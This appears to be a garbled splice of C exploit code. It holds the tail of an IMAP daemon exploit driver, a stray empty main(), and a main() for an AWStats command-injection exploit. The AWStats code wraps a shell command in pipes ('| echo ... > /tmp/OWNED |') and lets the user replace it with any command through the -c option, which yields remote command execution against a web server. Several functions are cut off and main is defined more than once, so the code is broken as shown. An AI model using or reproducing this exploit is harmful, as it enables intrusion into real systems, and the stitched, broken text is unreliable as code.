if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
printf(" [*] target imapd port\t\t: %u\n\n", imapdport);
printf(" [*] connecting...\t\t:");
fflush(stdout);
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket()");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" closed\n\n");
exit(1);
}
printf(" done!\n\n");
getinfo(host, imapdport);
exploit(host, imapdport);
}
main()
{
/*No args, no vectors*/
exploit();
}
int main(int argc, char * argv[])
{
extern char *optarg;
extern int optind, optopt;
int c,
Xport = 80,
isgood = 0;
char *Xhost = "localhost" ,
*Xip = "127.0.0.1",
*Xscript = "awstats.pl",
*Xpath = "/cgi-bin";
char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | ";
while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1)
{
switch(c)
{
case 'h':
Xhost = optarg;
isgood++;
break;
case 'i':
Xip = optarg;
isgood++;
break;
case 's':
Xscript = optarg;
break;
case 'p':
Xpath = optarg;
break;
case 'c':
if(strlen(optarg) > 1018)
{
printf("# `-c` argument can't exceed 1024 bytes (command to long)");
exit(0);
}
sprintf(exeCmd, " | %s | ", optarg);
break;
case 'o':
Xport = atoi(optarg);
break;
case 'u':
usage(argv[0]);
break;
case '?':
printf("# Unknown option `-%c`\n", optopt);
break;
}
}
if( isgood == 1)
{
printf("# Please specify both host `-h` and ip `-i`\n");
exit(0);
}
exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);
return 0;
}
